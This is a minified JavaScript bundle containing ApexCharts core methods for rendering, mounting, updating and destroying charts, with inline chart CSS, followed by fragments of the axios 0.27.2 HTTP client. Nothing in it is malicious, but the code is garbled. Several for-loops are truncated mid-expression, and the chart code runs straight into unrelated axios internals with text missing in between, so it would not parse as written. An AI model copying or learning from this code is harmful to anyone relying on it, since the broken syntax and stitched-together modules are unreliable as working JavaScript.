u(e,[{key:"initModules",value:function(){this.ctx.publicMethods=["updateOptions","updateSeries","appendData","appendSeries","toggleSeries","showSeries","hideSeries","setLocale","resetSeries","zoomX","toggleDataPointSelection","dataURI","addXaxisAnnotation","addYaxisAnnotation","addPointAnnotation","clearAnnotations","removeAnnotation","paper","destroy"],this.ctx.eventList=["click","mousedown","mousemove","mouseleave","touchstart","touchmove","touchleave","mouseup","touchend"],this.ctx.animations=new y(this.ctx),this.ctx.axes=new ne(this.ctx),this.ctx.core=new De(this.ctx.el,this.ctx),this.ctx.config=new F({}),this.ctx.data=new Z(this.ctx),this.ctx.grid=new Y(this.ctx),this.ctx.graphics=new S(this.ctx),this.ctx.coreUtils=new A(this.ctx),this.ctx.crosshairs=new ie(this.ctx),this.ctx.events=new ee(this.ctx),this.ctx.exports=new U(this.ctx),this.ctx.localization=new ae(this.ctx),this.ctx.options=new B,this.ctx.responsive=new te(this.ctx),this.ctx.series=new K(this.ctx),this.ctx.theme=new re(this.ctx),this.ctx.formatters=new J(this.ctx),this.ctx.titleSubtitle=new oe(this.ctx),this.ctx.legend=new pe(this.ctx),this.ctx.toolbar=new me(this.ctx),this.ctx.dimensions=new de(this.ctx),this.ctx.updateHelpers=new _e(this.ctx),this.ctx.zoomPanSelection=new fe(this.ctx),this.ctx.w.globals.tooltip=new Se(this.ctx)}}]),e}(),Oe=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"clear",value:function(e){var a=e.isUpdating;this.ctx.zoomPanSelection&&this.ctx.zoomPanSelection.destroy(),this.ctx.toolbar&&this.ctx.toolbar.destroy(),this.ctx.animations=null,this.ctx.axes=null,this.ctx.annotations=null,this.ctx.core=null,this.ctx.data=null,this.ctx.grid=null,this.ctx.series=null,this.ctx.responsive=null,this.ctx.theme=null,this.ctx.formatters=null,this.ctx.titleSubtitle=null,this.ctx.legend=null,this.ctx.dimensions=null,this.ctx.options=null,this.ctx.crosshairs=null,this.ctx.zoomPanSelection=null,this.ctx.updateHelpers=null,this.ctx.toolbar=null,this.ctx.localization=null,this.ctx.w.globals.tooltip=null,this.clearDomElements({isUpdating:a})}},{key:"killSVG",value:function(e){e.each((function(e,a){this.removeClass("*"),this.off(),this.stop()}),!0),e.ungroup(),e.clear()}},{key:"clearDomElements",value:function(e){var a=this,n=e.isUpdating,i=this.w.globals.dom.Paper.node;i.parentNode&&i.parentNode.parentNode&&!n&&(i.parentNode.parentNode.style.minHeight="unset");var t=this.w.globals.dom.baseEl;t&&this.ctx.eventList.forEach((function(e){t.removeEventListener(e,a.ctx.events.documentEvent)}));var r=this.w.globals.dom;if(null!==this.ctx.el)for(;this.ctx.el.firstChild;)this.ctx.el.removeChild(this.ctx.el.firstChild);this.killSVG(r.Paper),r.Paper.remove(),r.elWrap=null,r.elGraphical=null,r.elAnnotations=null,r.elLegendWrap=null,r.baseEl=null,r.elGridRect=null,r.elGridRectMask=null,r.elGridRectMarkerMask=null,r.elForecastMask=null,r.elNonForecastMask=null,r.elDefs=null}}]),e}(),Ve=new WeakMap,Fe=function(){function e(a,n){s(this,e),this.opts=n,this.ctx=this,this.w=new I(n).init(),this.el=a,this.w.globals.cuid=k.randomId(),this.w.globals.chartID=this.w.config.chart.id?k.escapeString(this.w.config.chart.id):this.w.globals.cuid,new He(this).initModules(),this.create=k.bind(this.create,this),this.windowResizeHandler=this._windowResizeHandler.bind(this),this.parentResizeHandler=this._parentResizeCallback.bind(this)}return u(e,[{key:"render",value:function(){var e=this;return new Promise((function(a,n){if(null!==e.el){void 0===Apex._chartInstances&&(Apex._chartInstances=[]),e.w.config.chart.id&&Apex._chartInstances.push({id:e.w.globals.chartID,group:e.w.config.chart.group,chart:e}),e.setLocale(e.w.config.chart.defaultLocale);var i=e.w.config.chart.events.beforeMount;if("function"==typeof i&&i(e,e.w),e.events.fireEvent("beforeMount",[e,e.w]),window.addEventListener("resize",e.windowResizeHandler),function(e,a){var n=!1,i=e.getBoundingClientRect();"none"!==e.style.display&&0!==i.width||(n=!0);var t=new ResizeObserver((function(i){n&&a.call(e,i),n=!0}));e.nodeType===Node.DOCUMENT_FRAGMENT_NODE?Array.from(e.children).forEach((function(e){return t.observe(e)})):t.observe(e),Ve.set(a,t)}(e.el.parentNode,e.parentResizeHandler),!e.css){var t=e.el.getRootNode&&e.el.getRootNode(),r=k.is("ShadowRoot",t),o=e.el.ownerDocument,s=o.getElementById("apexcharts-css");!r&&s||(e.css=document.createElement("style"),e.css.id="apexcharts-css",e.css.textContent='.apexcharts-canvas {\n position: relative;\n user-select: none;\n /* cannot give overflow: hidden as it will crop tooltips which overflow outside chart area */\n}\n\n\n/* scrollbar is not visible by default for legend, hence forcing the visibility */\n.apexcharts-canvas ::-webkit-scrollbar {\n -webkit-appearance: none;\n width: 6px;\n}\n\n.apexcharts-canvas ::-webkit-scrollbar-thumb {\n border-radius: 4px;\n background-color: rgba(0, 0, 0, .5);\n box-shadow: 0 0 1px rgba(255, 255, 255, .5);\n -webkit-box-shadow: 0 0 1px rgba(255, 255, 255, .5);\n}\n\n\n.apexcharts-inner {\n position: relative;\n}\n\n.apexcharts-text tspan {\n font-family: inherit;\n}\n\n.legend-mouseover-inactive {\n transition: 0.15s ease all;\n opacity: 0.20;\n}\n\n.apexcharts-series-collapsed {\n opacity: 0;\n}\n\n.apexcharts-tooltip {\n border-radius: 5px;\n box-shadow: 2px 2px 6px -4px #999;\n cursor: default;\n font-size: 14px;\n left: 62px;\n opacity: 0;\n pointer-events: none;\n position: absolute;\n top: 20px;\n display: flex;\n flex-direction: column;\n overflow: hidden;\n white-space: nowrap;\n z-index: 12;\n transition: 0.15s ease all;\n}\n\n.apexcharts-tooltip.apexcharts-active {\n opacity: 1;\n transition: 0.15s ease all;\n}\n\n.apexcharts-tooltip.apexcharts-theme-light {\n border: 1px solid #e3e3e3;\n background: rgba(255, 255, 255, 0.96);\n}\n\n.apexcharts-tooltip.apexcharts-theme-dark {\n color: #fff;\n background: rgba(30, 30, 30, 0.8);\n}\n\n.apexcharts-tooltip * {\n font-family: inherit;\n}\n\n\n.apexcharts-tooltip-title {\n padding: 6px;\n font-size: 15px;\n margin-bottom: 4px;\n}\n\n.apexcharts-tooltip.apexcharts-theme-light .apexcharts-tooltip-title {\n background: #ECEFF1;\n border-bottom: 1px solid #ddd;\n}\n\n.apexcharts-tooltip.apexcharts-theme-dark .apexcharts-tooltip-title {\n background: rgba(0, 0, 0, 0.7);\n border-bottom: 1px solid #333;\n}\n\n.apexcharts-tooltip-text-y-value,\n.apexcharts-tooltip-text-goals-value,\n.apexcharts-tooltip-text-z-value {\n display: inline-block;\n font-weight: 600;\n margin-left: 5px;\n}\n\n.apexcharts-tooltip-title:empty,\n.apexcharts-tooltip-text-y-label:empty,\n.apexcharts-tooltip-text-y-value:empty,\n.apexcharts-tooltip-text-goals-label:empty,\n.apexcharts-tooltip-text-goals-value:empty,\n.apexcharts-tooltip-text-z-value:empty {\n display: none;\n}\n\n.apexcharts-tooltip-text-y-value,\n.apexcharts-tooltip-text-goals-value,\n.apexcharts-tooltip-text-z-value {\n font-weight: 600;\n}\n\n.apexcharts-tooltip-text-goals-label, \n.apexcharts-tooltip-text-goals-value {\n padding: 6px 0 5px;\n}\n\n.apexcharts-tooltip-goals-group, \n.apexcharts-tooltip-text-goals-label, \n.apexcharts-tooltip-text-goals-value {\n display: flex;\n}\n.apexcharts-tooltip-text-goals-label:not(:empty),\n.apexcharts-tooltip-text-goals-value:not(:empty) {\n margin-top: -6px;\n}\n\n.apexcharts-tooltip-marker {\n width: 12px;\n height: 12px;\n position: relative;\n top: 0px;\n margin-right: 10px;\n border-radius: 50%;\n}\n\n.apexcharts-tooltip-series-group {\n padding: 0 10px;\n display: none;\n text-align: left;\n justify-content: left;\n align-items: center;\n}\n\n.apexcharts-tooltip-series-group.apexcharts-active .apexcharts-tooltip-marker {\n opacity: 1;\n}\n\n.apexcharts-tooltip-series-group.apexcharts-active,\n.apexcharts-tooltip-series-group:last-child {\n padding-bottom: 4px;\n}\n\n.apexcharts-tooltip-series-group-hidden {\n opacity: 0;\n height: 0;\n line-height: 0;\n padding: 0 !important;\n}\n\n.apexcharts-tooltip-y-group {\n padding: 6px 0 5px;\n}\n\n.apexcharts-tooltip-box, .apexcharts-custom-tooltip {\n padding: 4px 8px;\n}\n\n.apexcharts-tooltip-boxPlot {\n display: flex;\n flex-direction: column-reverse;\n}\n\n.apexcharts-tooltip-box>div {\n margin: 4px 0;\n}\n\n.apexcharts-tooltip-box span.value {\n font-weight: bold;\n}\n\n.apexcharts-tooltip-rangebar {\n padding: 5px 8px;\n}\n\n.apexcharts-tooltip-rangebar .category {\n font-weight: 600;\n color: #777;\n}\n\n.apexcharts-tooltip-rangebar .series-name {\n font-weight: bold;\n display: block;\n margin-bottom: 5px;\n}\n\n.apexcharts-xaxistooltip {\n opacity: 0;\n padding: 9px 10px;\n pointer-events: none;\n color: #373d3f;\n font-size: 13px;\n text-align: center;\n border-radius: 2px;\n position: absolute;\n z-index: 10;\n background: #ECEFF1;\n border: 1px solid #90A4AE;\n transition: 0.15s ease all;\n}\n\n.apexcharts-xaxistooltip.apexcharts-theme-dark {\n background: rgba(0, 0, 0, 0.7);\n border: 1px solid rgba(0, 0, 0, 0.5);\n color: #fff;\n}\n\n.apexcharts-xaxistooltip:after,\n.apexcharts-xaxistooltip:before {\n left: 50%;\n border: solid transparent;\n content: " ";\n height: 0;\n width: 0;\n position: absolute;\n pointer-events: none;\n}\n\n.apexcharts-xaxistooltip:after {\n border-color: rgba(236, 239, 241, 0);\n border-width: 6px;\n margin-left: -6px;\n}\n\n.apexcharts-xaxistooltip:before {\n border-color: rgba(144, 164, 174, 0);\n border-width: 7px;\n margin-left: -7px;\n}\n\n.apexcharts-xaxistooltip-bottom:after,\n.apexcharts-xaxistooltip-bottom:before {\n bottom: 100%;\n}\n\n.apexcharts-xaxistooltip-top:after,\n.apexcharts-xaxistooltip-top:before {\n top: 100%;\n}\n\n.apexcharts-xaxistooltip-bottom:after {\n border-bottom-color: #ECEFF1;\n}\n\n.apexcharts-xaxistooltip-bottom:before {\n border-bottom-color: #90A4AE;\n}\n\n.apexcharts-xaxistooltip-bottom.apexcharts-theme-dark:after {\n border-bottom-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip-bottom.apexcharts-theme-dark:before {\n border-bottom-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip-top:after {\n border-top-color: #ECEFF1\n}\n\n.apexcharts-xaxistooltip-top:before {\n border-top-color: #90A4AE;\n}\n\n.apexcharts-xaxistooltip-top.apexcharts-theme-dark:after {\n border-top-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip-top.apexcharts-theme-dark:before {\n border-top-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip.apexcharts-active {\n opacity: 1;\n transition: 0.15s ease all;\n}\n\n.apexcharts-yaxistooltip {\n opacity: 0;\n padding: 4px 10px;\n pointer-events: none;\n color: #373d3f;\n font-size: 13px;\n text-align: center;\n border-radius: 2px;\n position: absolute;\n z-index: 10;\n background: #ECEFF1;\n border: 1px solid #90A4AE;\n}\n\n.apexcharts-yaxistooltip.apexcharts-theme-dark {\n background: rgba(0, 0, 0, 0.7);\n border: 1px solid rgba(0, 0, 0, 0.5);\n color: #fff;\n}\n\n.apexcharts-yaxistooltip:after,\n.apexcharts-yaxistooltip:before {\n top: 50%;\n border: solid transparent;\n content: " ";\n height: 0;\n width: 0;\n position: absolute;\n pointer-events: none;\n}\n\n.apexcharts-yaxistooltip:after {\n border-color: rgba(236, 239, 241, 0);\n border-width: 6px;\n margin-top: -6px;\n}\n\n.apexcharts-yaxistooltip:before {\n border-color: rgba(144, 164, 174, 0);\n border-width: 7px;\n margin-top: -7px;\n}\n\n.apexcharts-yaxistooltip-left:after,\n.apexcharts-yaxistooltip-left:before {\n left: 100%;\n}\n\n.apexcharts-yaxistooltip-right:after,\n.apexcharts-yaxistooltip-right:before {\n right: 100%;\n}\n\n.apexcharts-yaxistooltip-left:after {\n border-left-color: #ECEFF1;\n}\n\n.apexcharts-yaxistooltip-left:before {\n border-left-color: #90A4AE;\n}\n\n.apexcharts-yaxistooltip-left.apexcharts-theme-dark:after {\n border-left-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-yaxistooltip-left.apexcharts-theme-dark:before {\n border-left-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-yaxistooltip-right:after {\n border-right-color: #ECEFF1;\n}\n\n.apexcharts-yaxistooltip-right:before {\n border-right-color: #90A4AE;\n}\n\n.apexcharts-yaxistooltip-right.apexcharts-theme-dark:after {\n border-right-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-yaxistooltip-right.apexcharts-theme-dark:before {\n border-right-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-yaxistooltip.apexcharts-active {\n opacity: 1;\n}\n\n.apexcharts-yaxistooltip-hidden {\n display: none;\n}\n\n.apexcharts-xcrosshairs,\n.apexcharts-ycrosshairs {\n pointer-events: none;\n opacity: 0;\n transition: 0.15s ease all;\n}\n\n.apexcharts-xcrosshairs.apexcharts-active,\n.apexcharts-ycrosshairs.apexcharts-active {\n opacity: 1;\n transition: 0.15s ease all;\n}\n\n.apexcharts-ycrosshairs-hidden {\n opacity: 0;\n}\n\n.apexcharts-selection-rect {\n cursor: move;\n}\n\n.svg_select_boundingRect, .svg_select_points_rot {\n pointer-events: none;\n opacity: 0;\n visibility: hidden;\n}\n.apexcharts-selection-rect + g .svg_select_boundingRect,\n.apexcharts-selection-rect + g .svg_select_points_rot {\n opacity: 0;\n visibility: hidden;\n}\n\n.apexcharts-selection-rect + g .svg_select_points_l,\n.apexcharts-selection-rect + g .svg_select_points_r {\n cursor: ew-resize;\n opacity: 1;\n visibility: visible;\n}\n\n.svg_select_points {\n fill: #efefef;\n stroke: #333;\n rx: 2;\n}\n\n.apexcharts-svg.apexcharts-zoomable.hovering-zoom {\n cursor: crosshair\n}\n\n.apexcharts-svg.apexcharts-zoomable.hovering-pan {\n cursor: move\n}\n\n.apexcharts-zoom-icon,\n.apexcharts-zoomin-icon,\n.apexcharts-zoomout-icon,\n.apexcharts-reset-icon,\n.apexcharts-pan-icon,\n.apexcharts-selection-icon,\n.apexcharts-menu-icon,\n.apexcharts-toolbar-custom-icon {\n cursor: pointer;\n width: 20px;\n height: 20px;\n line-height: 24px;\n color: #6E8192;\n text-align: center;\n}\n\n.apexcharts-zoom-icon svg,\n.apexcharts-zoomin-icon svg,\n.apexcharts-zoomout-icon svg,\n.apexcharts-reset-icon svg,\n.apexcharts-menu-icon svg {\n fill: #6E8192;\n}\n\n.apexcharts-selection-icon svg {\n fill: #444;\n transform: scale(0.76)\n}\n\n.apexcharts-theme-dark .apexcharts-zoom-icon svg,\n.apexcharts-theme-dark .apexcharts-zoomin-icon svg,\n.apexcharts-theme-dark .apexcharts-zoomout-icon svg,\n.apexcharts-theme-dark .apexcharts-reset-icon svg,\n.apexcharts-theme-dark .apexcharts-pan-icon svg,\n.apexcharts-theme-dark .apexcharts-selection-icon svg,\n.apexcharts-theme-dark .apexcharts-menu-icon svg,\n.apexcharts-theme-dark .apexcharts-toolbar-custom-icon svg {\n fill: #f3f4f5;\n}\n\n.apexcharts-canvas .apexcharts-zoom-icon.apexcharts-selected svg,\n.apexcharts-canvas .apexcharts-selection-icon.apexcharts-selected svg,\n.apexcharts-canvas .apexcharts-reset-zoom-icon.apexcharts-selected svg {\n fill: #008FFB;\n}\n\n.apexcharts-theme-light .apexcharts-selection-icon:not(.apexcharts-selected):hover svg,\n.apexcharts-theme-light .apexcharts-zoom-icon:not(.apexcharts-selected):hover svg,\n.apexcharts-theme-light .apexcharts-zoomin-icon:hover svg,\n.apexcharts-theme-light .apexcharts-zoomout-icon:hover svg,\n.apexcharts-theme-light .apexcharts-reset-icon:hover svg,\n.apexcharts-theme-light .apexcharts-menu-icon:hover svg {\n fill: #333;\n}\n\n.apexcharts-selection-icon,\n.apexcharts-menu-icon {\n position: relative;\n}\n\n.apexcharts-reset-icon {\n margin-left: 5px;\n}\n\n.apexcharts-zoom-icon,\n.apexcharts-reset-icon,\n.apexcharts-menu-icon {\n transform: scale(0.85);\n}\n\n.apexcharts-zoomin-icon,\n.apexcharts-zoomout-icon {\n transform: scale(0.7)\n}\n\n.apexcharts-zoomout-icon {\n margin-right: 3px;\n}\n\n.apexcharts-pan-icon {\n transform: scale(0.62);\n position: relative;\n left: 1px;\n top: 0px;\n}\n\n.apexcharts-pan-icon svg {\n fill: #fff;\n stroke: #6E8192;\n stroke-width: 2;\n}\n\n.apexcharts-pan-icon.apexcharts-selected svg {\n stroke: #008FFB;\n}\n\n.apexcharts-pan-icon:not(.apexcharts-selected):hover svg {\n stroke: #333;\n}\n\n.apexcharts-toolbar {\n position: absolute;\n z-index: 11;\n max-width: 176px;\n text-align: right;\n border-radius: 3px;\n padding: 0px 6px 2px 6px;\n display: flex;\n justify-content: space-between;\n align-items: center;\n}\n\n.apexcharts-menu {\n background: #fff;\n position: absolute;\n top: 100%;\n border: 1px solid #ddd;\n border-radius: 3px;\n padding: 3px;\n right: 10px;\n opacity: 0;\n min-width: 110px;\n transition: 0.15s ease all;\n pointer-events: none;\n}\n\n.apexcharts-menu.apexcharts-menu-open {\n opacity: 1;\n pointer-events: all;\n transition: 0.15s ease all;\n}\n\n.apexcharts-menu-item {\n padding: 6px 7px;\n font-size: 12px;\n cursor: pointer;\n}\n\n.apexcharts-theme-light .apexcharts-menu-item:hover {\n background: #eee;\n}\n\n.apexcharts-theme-dark .apexcharts-menu {\n background: rgba(0, 0, 0, 0.7);\n color: #fff;\n}\n\n@media screen and (min-width: 768px) {\n .apexcharts-canvas:hover .apexcharts-toolbar {\n opacity: 1;\n }\n}\n\n.apexcharts-datalabel.apexcharts-element-hidden {\n opacity: 0;\n}\n\n.apexcharts-pie-label,\n.apexcharts-datalabels,\n.apexcharts-datalabel,\n.apexcharts-datalabel-label,\n.apexcharts-datalabel-value {\n cursor: default;\n pointer-events: none;\n}\n\n.apexcharts-pie-label-delay {\n opacity: 0;\n animation-name: opaque;\n animation-duration: 0.3s;\n animation-fill-mode: forwards;\n animation-timing-function: ease;\n}\n\n.apexcharts-canvas .apexcharts-element-hidden {\n opacity: 0;\n}\n\n.apexcharts-hide .apexcharts-series-points {\n opacity: 0;\n}\n\n.apexcharts-gridline,\n.apexcharts-annotation-rect,\n.apexcharts-tooltip .apexcharts-marker,\n.apexcharts-area-series .apexcharts-area,\n.apexcharts-line,\n.apexcharts-zoom-rect,\n.apexcharts-toolbar svg,\n.apexcharts-area-series .apexcharts-series-markers .apexcharts-marker.no-pointer-events,\n.apexcharts-line-series .apexcharts-series-markers .apexcharts-marker.no-pointer-events,\n.apexcharts-radar-series path,\n.apexcharts-radar-series polygon {\n pointer-events: none;\n}\n\n\n/* markers */\n\n.apexcharts-marker {\n transition: 0.15s ease all;\n}\n\n@keyframes opaque {\n 0% {\n opacity: 0;\n }\n 100% {\n opacity: 1;\n }\n}\n\n\n/* Resize generated styles */\n\n@keyframes resizeanim {\n from {\n opacity: 0;\n }\n to {\n opacity: 0;\n }\n}\n\n.resize-triggers {\n animation: 1ms resizeanim;\n visibility: hidden;\n opacity: 0;\n}\n\n.resize-triggers,\n.resize-triggers>div,\n.contract-trigger:before {\n content: " ";\n display: block;\n position: absolute;\n top: 0;\n left: 0;\n height: 100%;\n width: 100%;\n overflow: hidden;\n}\n\n.resize-triggers>div {\n background: #eee;\n overflow: auto;\n}\n\n.contract-trigger:before {\n width: 200%;\n height: 200%;\n}',r?t.prepend(e.css):o.head.appendChild(e.css))}var l=e.create(e.w.config.series,{});if(!l)return a(e);e.mount(l).then((function(){"function"==typeof e.w.config.chart.events.mounted&&e.w.config.chart.events.mounted(e,e.w),e.events.fireEvent("mounted",[e,e.w]),a(l)})).catch((function(e){n(e)}))}else n(new Error("Element not found"))}))}},{key:"create",value:function(e,a){var n=this.w;new He(this).initModules();var i=this.w.globals;if(i.noData=!1,i.animationEnded=!1,this.responsive.checkResponsiveConfig(a),n.config.xaxis.convertedCatToNumeric&&new V(n.config).convertCatToNumericXaxis(n.config,this.ctx),null===this.el)return i.animationEnded=!0,null;if(this.core.setupElements(),"treemap"===n.config.chart.type&&(n.config.grid.show=!1,n.config.yaxis[0].show=!1),0===i.svgWidth)return i.animationEnded=!0,null;var t=A.checkComboSeries(e);i.comboCharts=t.comboCharts,i.comboBarCount=t.comboBarCount;var r=e.every((function(e){return e.data&&0===e.data.length}));(0===e.length||r)&&this.series.handleNoData(),this.events.setupEventHandlers(),this.data.parseData(e),this.theme.init(),new z(this).setGlobalMarkerSize(),this.formatters.setLabelFormatters(),this.titleSubtitle.draw(),i.noData&&i.collapsedSeries.length!==i.series.length&&!n.config.legend.showForSingleSeries||this.legend.init(),this.series.hasAllSeriesEqualX(),i.axisCharts&&(this.core.coreCalculations(),"category"!==n.config.xaxis.type&&this.formatters.setLabelFormatters(),this.ctx.toolbar.minX=n.globals.minX,this.ctx.toolbar.maxX=n.globals.maxX),this.formatters.heatmapLabelFormatters(),new A(this).getLargestMarkerSize(),this.dimensions.plotCoords();var o=this.core.xySettings();this.grid.createGridMask();var s=this.core.plotChartType(e,o),l=new E(this);l.bringForward(),n.config.dataLabels.background.enabled&&l.dataLabelsBackground(),this.core.shiftGraphPosition();var u={plot:{left:n.globals.translateX,top:n.globals.translateY,width:n.globals.gridWidth,height:n.globals.gridHeight}};return{elGraph:s,xyRatios:o,elInner:n.globals.dom.elGraphical,dimensions:u}}},{key:"mount",value:function(){var e=this,a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:null,n=this,i=n.w;return new Promise((function(t,r){if(null===n.el)return r(new Error("Not enough data to display or target element not found"));(null===a||i.globals.allSeriesCollapsed)&&n.series.handleNoData(),"treemap"!==i.config.chart.type&&n.axes.drawAxis(i.config.chart.type,a.xyRatios),n.grid=new Y(n);var o=n.grid.drawGrid();n.annotations=new T(n),n.annotations.drawImageAnnos(),n.annotations.drawTextAnnos(),"back"===i.config.grid.position&&o&&i.globals.dom.elGraphical.add(o.el);var s=new q(e.ctx),l=new $(e.ctx);if(null!==o&&(s.xAxisLabelCorrections(o.xAxisTickWidth),l.setYAxisTextAlignments(),i.config.yaxis.map((function(e,a){-1===i.globals.ignoreYAxisIndexes.indexOf(a)&&l.yAxisTitleRotate(a,e.opposite)}))),"back"===i.config.annotations.position&&(i.globals.dom.Paper.add(i.globals.dom.elAnnotations),n.annotations.drawAxesAnnotations()),Array.isArray(a.elGraph))for(var u=0;u0&&i.globals.memory.methodsToExec.forEach((function(e){e.method(e.params,!1,e.context)})),i.globals.axisCharts||i.globals.noData||n.core.resizeNonAxisCharts(),t(n)}))}},{key:"destroy",value:function(){var e,a;window.removeEventListener("resize",this.windowResizeHandler),this.el.parentNode,e=this.parentResizeHandler,(a=Ve.get(e))&&(a.disconnect(),Ve.delete(e));var n=this.w.config.chart.id;n&&Apex._chartInstances.forEach((function(e,a){e.id===k.escapeString(n)&&Apex._chartInstances.splice(a,1)})),new Oe(this.ctx).clear({isUpdating:!1})}},{key:"updateOptions",value:function(e){var a=this,n=arguments.length>1&&void 0!==arguments[1]&&arguments[1],i=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],t=!(arguments.length>3&&void 0!==arguments[3])||arguments[3],r=!(arguments.length>4&&void 0!==arguments[4])||arguments[4],o=this.w;return o.globals.selection=void 0,e.series&&(this.series.resetSeries(!1,!0,!1),e.series.length&&e.series[0].data&&(e.series=e.series.map((function(e,n){return a.updateHelpers._extendSeries(e,n)}))),this.updateHelpers.revertDefaultAxisMinMax()),e.xaxis&&(e=this.updateHelpers.forceXAxisUpdate(e)),e.yaxis&&(e=this.updateHelpers.forceYAxisUpdate(e)),o.globals.collapsedSeriesIndices.length>0&&this.series.clearPreviousPaths(),e.theme&&(e=this.theme.updateThemeOptions(e)),this.updateHelpers._updateOptions(e,n,i,t,r)}},{key:"updateSeries",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=!(arguments.length>2&&void 0!==arguments[2])||arguments[2];return this.series.resetSeries(!1),this.updateHelpers.revertDefaultAxisMinMax(),this.updateHelpers._updateSeries(e,a,n)}},{key:"appendSeries",value:function(e){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],i=this.w.config.series.slice();return i.push(e),this.series.resetSeries(!1),this.updateHelpers.revertDefaultAxisMinMax(),this.updateHelpers._updateSeries(i,a,n)}},{key:"appendData",value:function(e){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=this;n.w.globals.dataChanged=!0,n.series.getPreviousPaths();for(var i=n.w.config.series.slice(),t=0;t0&&void 0!==arguments[0])||arguments[0],a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1];this.series.resetSeries(e,a)}},{key:"addEventListener",value:function(e,a){this.events.addEventListener(e,a)}},{key:"removeEventListener",value:function(e,a){this.events.removeEventListener(e,a)}},{key:"addXaxisAnnotation",value:function(e){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:void 0,i=this;n&&(i=n),i.annotations.addXaxisAnnotationExternal(e,a,i)}},{key:"addYaxisAnnotation",value:function(e){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:void 0,i=this;n&&(i=n),i.annotations.addYaxisAnnotationExternal(e,a,i)}},{key:"addPointAnnotation",value:function(e){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:void 0,i=this;n&&(i=n),i.annotations.addPointAnnotationExternal(e,a,i)}},{key:"clearAnnotations",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:void 0,a=this;e&&(a=e),a.annotations.clearAnnotations(a)}},{key:"removeAnnotation",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:void 0,n=this;a&&(n=a),n.annotations.removeAnnotation(n,e)}},{key:"getChartArea",value:function(){return this.w.globals.dom.baseEl.querySelector(".apexcharts-inner")}},{key:"getSeriesTotalXRange",value:function(e,a){return this.coreUtils.getSeriesTotalsXRange(e,a)}},{key:"getHighestValueInSeries",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=new Q(this.ctx);return a.getMinYMaxY(e).highestY}},{key:"getLowestValueInSeries",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=new Q(this.ctx);return a.getMinYMaxY(e).lowestY}},{key:"getSeriesTotal",value:function(){return this.w.globals.seriesTotals}},{key:"toggleDataPointSelection",value:function(e,a){return this.updateHelpers.toggleDataPointSelection(e,a)}},{key:"zoomX",value:function(e,a){this.ctx.toolbar.zoomUpdateOptions(e,a)}},{key:"setLocale",value:function(e){this.localization.setCurrentLocaleValues(e)}},{key:"dataURI",value:function(e){return new U(this.ctx).dataURI(e)}},{key:"paper",value:function(){return this.w.globals.dom.Paper}},{key:"_parentResizeCallback",value:function(){this.w.globals.animationEnded&&this.w.config.chart.redrawOnParentResize&&this._windowResize()}},{key:"_windowResize",value:function(){var e=this;clearTimeout(this.w.globals.resizeTimer),this.w.globals.resizeTimer=window.setTimeout((function(){e.w.globals.resized=!0,e.w.globals.dataChanged=!1,e.ctx.update()}),150)}},{key:"_windowResizeHandler",value:function(){var e=this.w.config.chart.redrawOnWindowResize;"function"==typeof e&&(e=e()),e&&this._windowResize()}}],[{key:"getChartByID",value:function(e){var a=k.escapeString(e),n=Apex._chartInstances.filter((function(e){return e.id===a}))[0];return n&&n.chart}},{key:"initOnLoad",value:function(){for(var a=document.querySelectorAll("[data-apexcharts]"),n=0;n2?t-2:0),o=2;o=200&&e<300},headers:{common:{Accept:"application/json, text/plain, */*"}}};i.forEach(["delete","get","head"],(function(e){c.headers[e]={}})),i.forEach(["post","put","patch"],(function(e){c.headers[e]=i.merge(l)})),e.exports=c},6789:function(e){"use strict";e.exports={silentJSONParsing:!0,forcedJSONParsing:!0,clarifyTimeoutError:!1}},7600:function(e){e.exports={version:"0.27.2"}},4049:function(e){"use strict";e.exports=function(e,a){return function(){for(var n=new Array(arguments.length),i=0;i=0)return;o[a]="set-cookie"===a?(o[a]?o[a]:[]).concat([n]):o[a]?o[a]+", "+n:n}})),o):o}},6261:function(e){"use strict";e.exports=function(e){var a=/^([-+\w]{1,25})(:?\/\/|:)/.exec(e);return a&&a[1]||""}},8089:function(e){"use strict";e.exports=function(e){return function(a){return e.apply(null,a)}}},1397:function(e,a,n){"use strict";var i=n(3589);e.exports=function(e,a){a=a||new FormData;var n=[];function t(e){return null===e?"":i.isDate(e)?e.toISOString():i.isArrayBuffer(e)||i.isTypedArray(e)?"function"===typeof Blob?new Blob([e]):Buffer.from(e):e}return function e(r,o){if(i.isPlainObject(r)||i.isArray(r)){if(-1!==n.indexOf(r))throw Error("Circular reference detected in "+o);n.push(r),i.forEach(r,(function(n,r){if(!i.isUndefined(n)){var s,l=o?o+"."+r:r;if(n&&!o&&"object"===typeof n)if(i.endsWith(r,"{}"))n=JSON.stringify(n);else if(i.endsWith(r,"[]")&&(s=i.toArray(n)))return void s.forEach((function(e){!i.isUndefined(e)&&a.append(l,t(e))}));e(n,l)}})),n.pop()}else a.append(o,t(r))}(e),a}},7835:function(e,a,n){"use strict";var 